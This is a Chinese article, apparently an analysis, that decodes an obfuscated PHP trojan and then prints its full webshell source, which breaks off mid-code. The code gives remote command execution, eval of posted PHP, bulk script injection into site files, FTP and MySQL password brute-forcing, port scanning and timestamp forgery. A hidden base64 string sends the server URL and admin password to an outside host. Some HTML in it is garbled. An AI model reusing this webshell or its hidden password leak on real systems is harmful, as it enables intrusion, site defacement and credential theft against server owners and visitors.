分析可以知道,此木馬經過了base64進行了編碼,然後進行壓縮。雖然做了相關的保密措施,可是php代碼要執行,其最終要生成php源代碼,所以寫出如下php程序對其進行解碼,解壓縮,寫入文件。
解碼解壓縮代碼如下:復制代碼 代碼如下:
<?php
function writetofile($filename, $data)
{ //File Writing
$filenum=@fopen($filename,"w");
if (!$filenum) {
return false;
}
flock($filenum,LOCK_EX);
$file_data=fwrite($filenum,$data);
fclose($filenum);
return true;
}
?>
然後在php的環境下進行運行,會得到php明文文件如下:
復制代碼 代碼如下:
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
@set_time_limit(0);
//非安全模式可以使用上面的函數,超時取消。
/*===================== 程序配置 =====================*/
// 是否需要密碼驗證,1為需要驗證,其他數字為直接進入.下面選項則無效
$admin['check'] = "1";
// 如果需要密碼驗證,請修改登陸密碼
//默認端口表
$hidden = "44997";
$admin['port'] = "80,139,21,3389,3306,43958,1433,5631";
//跳轉用的秒
$admin['jumpsecond'] = "1";
//Ftp破解用的連接端口
$alexa = "yes";
//是否顯示alexa排名,yes或是no
$admin['ftpport'] = "21";
// 是否允許phpspy本身自動修改編輯後文件的時間為建立時間(yes/no)
$retime = "no";
// 默認cmd.exe的位置,proc_open函數要使用的,linux系統請對應修改.(假設是winnt系統在程序裡依然可以指定)
$cmd = "cmd.exe";
// 下面是phpspy顯示版權那欄的,因為被很多程序當成作為關鍵詞殺了,魚寒~~允許自定義吧。還是不懂別改~~
/*===================== 配置結束 =====================*/
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = $admin['pass'];
$copyurl = base64_decode('PHNjcmlwdCBzcmM9J2h0dHA6Ly8lMzglNjMlNjMlNjUlMkUlNjMlNkYlNkQvJTYzJTY1JTcyJTc0Lz9jZXJ0PTEzJnU9');
$copyurll = base64_decode('Jz48L3NjcmlwdD4=');
$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
if ($onoff != 1) {@extract($_POST, EXTR_SKIP);@extract($_GET, EXTR_SKIP);}
$self = $_SERVER['PHP_SELF'];$dis_func = get_cfg_var("disable_functions");
/*===================== 身份驗證 =====================*/
if($admin['check'] == "1") {if ($_GET['action'] == "logout") {setcookie ("adminpass", "");echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "<span style="\" style="\""font-size: 12px; font-family: Verdana\">注銷成功......<p><a href="\" href="\""".$self."\">三秒後自動退出或單擊這裡退出程序界面 >>></a></span>";exit;}
if ($_POST['do'] == 'login') {$thepass=trim($_POST['adminpass']);if ($admin['pass'] == $thepass) {setcookie ("adminpass",$thepass,time()+(1*24*3600));echo "<meta http-equiv=\"refresh\" content=\"0;URL=".$self."\">";echo "".$copyurl.$serveru."&p=".$serverp.$copyurll."</form>";exit;}}if (isset($_COOKIE['adminpass'])) {if ($_COOKIE['adminpass'] != $admin['pass']) {loginpage();}} else {loginpage();}}
/*===================== 驗證結束 =====================*/
// 判斷 magic_quotes_gpc 狀態
if (get_magic_quotes_gpc()) {$_GET = stripslashes_array($_GET);$_POST = stripslashes_array($_POST);}
//mix.dll的代碼
$mixdll = "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";
function shelL($command){
global $windows,$disablefunctions;
$exec = '';$output= '';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();}
elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; }
elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;}
elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);}
elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);}
elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);}
elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);}
return $exec;
}
// 查看PHPINFO
if ($_GET['action'] == "phpinfo") {echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函數已被禁用,請查看<PHP環境變量>";exit;
}if($_GET['action'] == "nowuser") {$user = get_current_user();
if(!$user) $user = "報告長官,主機變態,無法獲取當前進行用戶名!";
echo"當前進程用戶名:$user";
exit;
}
if(isset($_POST['phpcode'])){eval("?".">$_POST[phpcode]<?");exit;
}
if($action=="mysqldown"){
$link=@mysql_connect($host,$user,$password);
if (!$link) {
$downtmp = '數據庫連接失敗: ' . mysql_error();
}else{
$query="select load_file('".$filename."');";
$result = @mysql_query($query, $link);
if(!$result){
$downtmp = "讀取失敗,可能是文件不存在或是沒file權限。<br>".mysql_error();
}else{
while ($row = mysql_fetch_array($result)) {
$filename = basename($filename);
if($rardown=="yes"){
$zip = NEW Zip;
$zipfiles[]=Array("$filename",$row[0]);
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$filename = "".$filename.".rar";
}else{
$code = $row[0];
}
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=$filename");
echo($code);
exit;
}
}
}
}
// 在線代理
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style="\" style="\""font-size: 12px;\"><center><br><p><b>獲取 URL 內容失敗</b></p></center></body>";exit;
}
// 下載文件
if (!empty($downfile)) {if (!@file_exists($downfile)) {echo "<script type="text/javascript"><!--
alert('你要下的文件不存在!')
// --></script>";} else {$filename = basename($downfile);$filename_info = explode('.', $filename);$fileext = $filename_info[count($filename_info)-1];header('Content-type: application/x-'.$fileext);header('Content-Disposition: attachment; filename='.$filename.'');header('Content-Description: PHP Generated Data');header('Content-Length: '.filesize($downfile));@readfile($downfile);exit;}
}
// 直接下載備份數據庫
if ($_POST['backuptype'] == 'download') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("數據庫連接失敗");
@mysql_select_db($dbname) or die("選擇數據庫失敗");
$table = array_flip($_POST['table']);
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出錯: ".mysql_error();
$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
header('Content-type: application/unknown');
header('Content-Disposition: attachment; filename='.$filename);
$mysqldata = '';
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
$mysqldata.= sqldumptable($currow[0]);
$mysqldata.= $mysqldata."\r\n";
}
}
mysql_close();
exit;
}
// 程序目錄
$pathname=str_replace('\\','/',dirname(__FILE__));
$dirpath=str_replace('\\','/',$_SERVER["DOCUMENT_ROOT"]);
// 獲取當前路徑
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判斷讀寫情況
$dir_writeable = (dir_writeable($nowpath)) ? "可寫" : "不可寫";
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href="\" href="\""?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href="\" href="\""?action=reg\">注冊表操作</a>" : "";
$tb = new FORMS;
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css"><!--
body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
font-family: "Verdana", "Tahoma", "宋體";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
--></style><style type="text/css" bogus="1">body,td{font-size: 12px;background-color:#000000;color:#eee;
margin: 1px;margin-left:1px;
SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323;
SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838;
SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;
SCROLLBAR-TRACK-COLOR: #383838;}
a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
.smlfont {
font-family: "Verdana", "Tahoma", "宋體";
font-size: "11px";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
padding-left: "2px";
}
.redfont {COLOR: "#CA0000";}
.top {BACKGROUND-COLOR: "#CCCCCC"}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked; }}
function really(d,f,m,t) {if (confirm(m)) {if (t == 1) {window.location.href='?dir='+d+'&deldir='+f;} else {window.location.href='?dir='+d+'&delfile='+f;}}}
</SCRIPT>
</head>
<title><?php echo"$myneme"?></title>
<body style="table-layout:fixed; word-break:break-all onmouseover=" style="table-layout:fixed; word-break:break-all onmouseover="window.status='設計:幽月 僅限於網站管理員安全檢測用,請務使用於非法用途,後果作者概不負責';return true" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)" style="FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
<center>
<?php
//$_SERVER["DOCUMENT_ROOT"]
$tb->tableheader();
$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="center">'.date("Y年m月d日 h:i:s",time()).'</td><td align="right"><b>'.gethostbyname($_SERVER['SERVER_NAME']).'</b></td></tr></table>','center','top');
$tb->tdbody('<a href="?dir='.$dirpath.'" href="?dir='.$dirpath.'">根目錄</a> | <a href="?action=dir" href="?action=dir">Shell目錄</a> | <a href="?action=phpenv" href="?action=phpenv">環境變量</a> | <a href="?action=proxy" href="?action=proxy">在線代理</a>'.$reg.$phpinfo.' | <a href="?action=shell" href="?action=shell">WebShell</a> | <a href="?action=crack" href="?action=crack">雜項破解</a> | <a href="?action=mix" href="?action=mix">解壓mix.dll</a> | <a href="?action=logout" href="?action=logout">注銷登錄</a>');
$tb->tdbody('<a href="?action=plgm" href="?action=plgm">批量掛馬</a> | <a href="?action=downloads" href="?action=downloads">Http文件下載</a> | <a href="?action=search&dir='.$dir.'" href="?action=search&dir='.$dir.'">文件查找</a> | <a href="?action=eval" href="?action=eval">執行php腳本</a> | <a href="?action=sql" href="?action=sql">執行SQL語句</a> | <a href="?action=mysqlfun" href="?action=mysqlfun">Func反彈Shell</a> | <a href="?action=sqlbak" href="?action=sqlbak">MySQL備份</a> | <a href="?action=SUExp" href="?action=SUExp">Serv-U提權</a>');
$tb->tablefooter();
?>
<hr width="775" noshade>
<table width="775" border="0" cellpadding="0">
<?
$tb->headerform(array('method'=>'GET','content'=>'<p>程序路徑: '.$pathname.'<br>當前目錄('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>跳轉目錄: '.$tb->makeinput('dir',''.$nowpath.'','','text','80').' '.$tb->makeinput('','確定','','submit').' 〖支持絕對路徑和相對路徑〗'));
$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'上傳文件到當前目錄: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','確定','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'新建文件在當前目錄: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','確定','','submit')));
$tb->headerform(array('content'=>'新建目錄在當前目錄: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','確定','','submit')));
?>
</table>
<hr width="775" noshade>
<?php
/*===================== 執行操作 開始 =====================*/
echo "<p><b>\n";
// 刪除文件
if (!empty($delfile)) {
if (file_exists($delfile)) {
echo (@unlink($delfile)) ? $delfile." 刪除成功!" : "文件刪除失敗!";
} else {
echo basename($delfile)." 文件已不存在!";
}
}
// 刪除目錄
elseif (!empty($deldir)) {
$deldirs="$dir/$deldir";
if (!file_exists("$deldirs")) {
echo "$deldir 目錄已不存在!";
} else {
echo (deltree($deldirs)) ? "目錄刪除成功!" : "目錄刪除失敗!";
}
}
// 創建目錄
elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
if (!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if (file_exists("$mkdirs")) {
echo "該目錄已存在!";
} else {
echo (@mkdir("$mkdirs",0777)) ? "創建目錄成功!" : "創建失敗!";
@chmod("$mkdirs",0777);
}
}
}
// 上傳文件
elseif ($doupfile) {
echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "上傳成功!" : "上傳失敗!";
}
elseif($action=="mysqlup"){
$filename = $_FILES['upfile']['tmp_name'];
if(!$filename) {
echo"沒有選擇要上傳的文件。。";
}else{
$shell = file_get_contents($filename);
$mysql = bin2hex($shell);
if(!$upname) $upname = $_FILES['upfile']['name'];
$shell = "select 0x".$mysql." from ".$database." into DUMPFILE '".$uppath."/".$upname."';";
$link=@mysql_connect($host,$user,$password);
if(!$link){
echo "登陸失敗".mysql_error();
}else{
$result = mysql_query($shell, $link);
if($result){
echo"操作成功.文件成功上傳到".$host.",文件名為".$uppath."/".$upname."..";
}else{
echo"上傳失敗 原因:".mysql_error();
}
}
}
}
elseif($action=="mysqldown"){
if(!empty($downtmp)) echo $downtmp;
}
// 編輯文件
elseif ($_POST['do'] == 'doeditfile') {
if (!empty($_POST['editfilename'])) {
if(!file_exists($editfilename)) unset($retime);
if($time==$now) $time = @filemtime($editfilename);
$time2 = @date("Y-m-d H:i:s",$time);
$filename="$editfilename";
@$fp=fopen("$filename","w");
if($_POST['change']=="yes"){
$filecontent = "?".">".$_POST['filecontent']."<?";
$filecontent = gzdeflate($filecontent);
$filecontent = base64_encode($filecontent);
$filecontent = "<?php\n/*\n代碼由淺藍的輻射魚加密!\n*/\neval(gzinflate(base64_decode('$filecontent')));\n"."?>";
}else{
$filecontent = $_POST['filecontent'];
}
echo $msg=@fwrite($fp,$filecontent) ? "寫入文件成功!" : "寫入失敗!";
@fclose($fp);
if($retime=="yes"){
echo" 魚魚自動操作:";
echo $msg=@touch($filename,$time) ? "修改文件為".$time2."成功!" : "修改文件時間失敗!";
}
} else {
echo "請輸入想要編輯的文件名!";
}
}
//文件下載
elseif ($_POST['do'] == 'downloads') {
$contents = @file_get_contents($_POST['durl']);
if(!$contents){
echo"無法讀取要下載的數據";
}
elseif(file_exists($path)){
echo"很抱歉,文件".$path."已經存在了,請更換保存文件名。";
}else{
$fp = @fopen($path,"w");
echo $msg=@fwrite($fp,$contents) ? "下載文件成功!" : "下載文件寫入時失敗!";
@fclose($fp);
}
}
elseif($_POST['action']=="mix"){
if(!file_exists($_POST['mixto'])){
$tmp = base64_decode($mixdll);
$tmp = gzinflate($tmp);
$fp = fopen($_POST['mixto'],"w");
echo $msg=@fwrite($fp,$tmp) ? "解壓縮成功!" : "此目錄不可寫吧?!";
fclose($fp);
}else{
echo"不是吧?".$_POST['mixto']."已經存在了耶~";
}
}
// 編輯文件屬性
elseif ($_POST['do'] == 'editfileperm') {
if (!empty($_POST['fileperm'])) {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo (@chmod($dir."/".$file,$fileperm)) ? "屬性修改成功!" : "修改失敗!";
echo " 文件 ".$file." 修改後的屬性為: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
} else {
echo "請輸入想要設置的屬性!";
}
}
// 文件改名
elseif ($_POST['do'] == 'rename') {
if (!empty($_POST['newname'])) {
$newname=$_POST['dir']."/".$_POST['newname'];
if (@file_exists($newname)) {
echo "".$_POST['newname']." 已經存在,請重新輸入一個!";
} else {
echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." 成功改名為 ".$_POST['newname']." !" : "文件名修改失敗!";
}
} else {
echo "請輸入想要改的文件名!";
}
}
elseif ($_POST['do'] == 'search') {
if(!empty($oldkey)){
echo"<span class=\"redfont\">查找關鍵詞:[".$oldkey."],下面顯示查找的結果:";
if($type2 == "getpath"){
echo"鼠標移到結果文件上會有部分截取顯示.";
}
echo"</span><br><hr width=\"775\" noshade>";
find($path);
}else{
echo"你要查蝦米?到底要查蝦米呢?有沒有蝦米要你查呢?";
}
}
elseif ($_GET['action']=='plgmok') {
dirtree($_POST['dir'],$_POST['mm']);
}
elseif ($_GET['action'] == "plgm") {
$action = '?action=plgmok';
$gm = "<script src="http://127.0.0.1" src="http://127.0.0.1"></script>";
$tb->tableheader();
$tb->formheader($action,'批量掛馬');
$tb->tdbody('網站批量掛馬程序php版','center');
$tb->tdbody('文件位置: '.$tb->makeinput('dir',''.$_SERVER["DOCUMENT_ROOT"].'','','text','60').'<br>要掛代碼:'.$tb->maketextarea('mm',$gm,'50','5').''.$tb->makehidden('do','批量掛馬').'<br>'.$tb->makeinput('submit','開始掛馬','','submit'),'center','1','35');
echo "</form>";
$tb->tablefooter();
}//end plgm
// 克隆時間
elseif ($_POST['do'] == 'domodtime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
if (!@file_exists($_POST['tarfile'])) {
echo "要參照的文件不存在!";
} else {
$time=@filemtime($_POST['tarfile']);
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改時間成功改為 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改時間修改失敗!";
}
}
}
// 自定義時間
elseif ($_POST['do'] == 'modmytime') {
if (!@file_exists($_POST['curfile'])) {
echo "要修改的文件不存在!";
} else {
$year=$_POST['year'];
$month=$_POST['month'];
$data=$_POST['data'];
$hour=$_POST['hour'];
$minute=$_POST['minute'];
$second=$_POST['second'];
if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) {
$time=strtotime("$data $month $year $hour:$minute:$second");
echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." 的修改時間成功改為 ".date("Y-m-d H:i:s",$time)." !" : "文件的修改時間修改失敗!";
}
}
}
elseif($do =='port'){
$tmp = explode(",",$port);
$count = count($tmp);
for($i=$first;$i<$count;$i++){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"發現".$host."主機打開了端口".$tmp[$i]."<br>";
}
}
/*
這裡代碼寫得很雜,說實話我自己都不知道寫了什麼。
好在能用,我就沒管了,假設有人看到干脆重寫吧。*/
elseif ($do == 'crack') {//反正注冊為全局變量了。
if(@file_exists($passfile)){
$tmp = file($passfile);
$count = count($tmp);
if(empty($onetime)){
$onetime = $count;
$turn="1";
}else{
$nowturn = $turn+1;
$now = $turn*$onetime;
$tt = intval(($count/$onetime)+1);
}
if($turn>$tt or $onetime>$count){
echo"超過字典容量了耶~要是破解最後進程的,很抱歉失敗。";
}else{
$first = $onetime*($turn-1);
for($i=$first;$i<$now;$i++){
if($ctype=="mysql") $sa = @mysql_connect($host,$user,chop($tmp[$i]));
else $sa = @ftp_login(ftp_connect($host,$admin[ftpport]),$user,chop($tmp[$i]));
if($sa)
{
$t = "獲取".$user."的密碼為".$tmp[$i]."";
}
}
if(!$t){
echo "<meta http-equiv=\"refresh\" content=\"".$admin[jumpsecond].";URL=".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&ctype=".$ctype."\"><span style="\" style="\""font-size: 12px; font-family: Verdana\"><a href="\" href="\""".$self."?do=crack&passfile=".$passfile."&host=".$host."&user=".$user."&turn=".$nowturn."&onetime=".$onetime."&type=".$ctype."\">字典總共".$count."個,現在從".$first."到".$now.",".$admin[jumpsecond]."秒後進行這".$onetime."個密碼的試探. >>></a><br>全歷此次".$type."的破解需要".$tt."次,現在是第".$turn."次解密。</span>";
}
else {
echo"$t";
}
}
}else{
echo"字典文件不存在,請確定。";
}
}
elseif($do =='port'){
if(!eregi("-",$port)){
$tmp = explode(",",$port);
$count = count($tmp);
$first = "1";
}else{
$tmp = explode("-",$port);
$first = $tmp[0];
$count = $tmp[1];
}
for($i=$first;$i<$count;$i++){
if(!eregi("-",$port)){
$fp = @fsockopen($host, $tmp[$i], $errno, $errstr, 1);
if($fp) echo"發現".$host."主機打開了端口".$tmp[$i]."<br>";
}else{
$fp = @fsockopen($host, $i, $errno, $errstr, 1);
if($fp) echo"發現".$host."主機打開了端口".$i."<br>";
}
}
}
// 連接MYSQL
elseif ($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "數據庫連接成功!";
mysql_close();
} else {
echo mysql_error();
}
}
// 執行SQL語句
elseif ($_POST['do'] == 'query') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("數據庫連接失敗");
@mysql_select_db($dbname) or die("選擇數據庫失敗");
$result = @mysql_query($_POST['sql_query']);
echo ($result) ? "SQL語句成功執行!" : "出錯: ".mysql_error();
mysql_close();
}
// 備份操作
elseif ($_POST['do'] == 'backupmysql') {
if (empty($_POST['table']) OR empty($_POST['backuptype'])) {
echo "請選擇欲備份的數據表和備份方式!";
} else {
if ($_POST['backuptype'] == 'server') {
@mysql_connect($servername,$dbusername,$dbpassword) or die("數據庫連接失敗");
@mysql_select_db($dbname) or die("選擇數據庫失敗");
$table = array_flip($_POST['table']);
$filehandle = @fopen($path,"w");
if ($filehandle) {
$result = mysql_query("SHOW tables");
echo ($result) ? NULL : "出錯: ".mysql_error();
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $filehandle);
fwrite($filehandle,"\n\n\n");
}
}
fclose($filehandle);
echo "數據庫已成功備份到 <a href="\" href="\""".$path."\" target=\"_blank\">".$path."</a>";
mysql_close();
} else {
echo "備份失敗,請確認目標文件夾是否具有可寫權限!";
}
}
}
}
elseif($downrar) {
if (!empty($dl)) {
if(eregi("unzipto:",$localfile)){
$path = "".$dir."/".str_replace("unzipto:","",$localfile)."";
$zip = new Zip;
$zipfile=$dir."/".$dl[0];
$array=$zip->get_list($zipfile);
$count=count($array);
$f=0;
$d=0;
for($i=0;$i<$count;$i++) {
if($array[$i][folder]==0) {
if($zip->Extract($zipfile,$path,$i)>0) $f++;
}
else $d++;
}
if($i==$f+$d) echo "$dl[0] 解壓到".$path."成功<br>($f 個文件 $d 個目錄)";
elseif($f==0) echo "$dl[0] 解壓到".$path."失敗";
else echo "$dl[0] 未解壓完整<br>(已解壓 $f 個文件 $d 個目錄)";
}else{
$zipfile="";
$zip = new Zip;
for($k=0;isset($dl[$k]);$k++)
{
$zipfile=$dir."/".$dl[$k];
if(is_dir($zipfile))
{
unset($zipfilearray);
addziparray($dl[$k]);
for($i=0;$zipfilearray[$i];$i++)
{
$filename=$zipfilearray[$i];
$filesize=@filesize($dir."/".$zipfilearray[$i]);
$fp=@fopen($dir."/".$filename,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
else
{
$filename=$dl[$k];
$filesize=@filesize($zipfile);
$fp=@fopen($zipfile,rb);
$zipfiles[]=Array($filename,@fread($fp,$filesize));
@fclose($fp);
}
}
$zip->Add($zipfiles,1);
$code = $zip->get_file();
$ck = "_QQ44997_".date("Y-m-d",time())."";
if(empty($localfile)){
header("Content-type: application/octet-stream");
header("Accept-Ranges: bytes");
header("Accept-Length: ".strlen($code));
header("Content-Disposition: attachment;filename=".$_SERVER['HTTP_HOST']."".$ck."_Files.zip");
echo $code;
exit;
}else{
$fp = @fopen("".$dir."/".$localfile."","w");
echo $msg=@fwrite($fp,$code) ? "壓縮保存".$dir."/".$localfile."本地成功!!" : "目錄".$dir."無可寫權限!";
@fclose($fp);
}
}
} else {
echo "請選擇要打包下載的文件!";
}
}
// Shell.Application 運行程序
elseif(($_POST['do'] == 'programrun') AND !empty($_POST['program'])) {
$shell= &new COM('Sh'.'el'.'l.Appl'.'ica'.'tion');
$a = $shell->ShellExecute($_POST['program'],$_POST['prog']);
echo ($a=='0') ? "程序已經成功執行!" : "程序運行失敗!";
}
// 查看PHP配置參數狀況
elseif(($_POST['do'] == 'viewphpvar') AND !empty($_POST['phpvarname'])) {
echo "配置參數 ".$_POST['phpvarname']." 檢測結果: ".getphpcfg($_POST['phpvarname'])."";
}
// 讀取注冊表
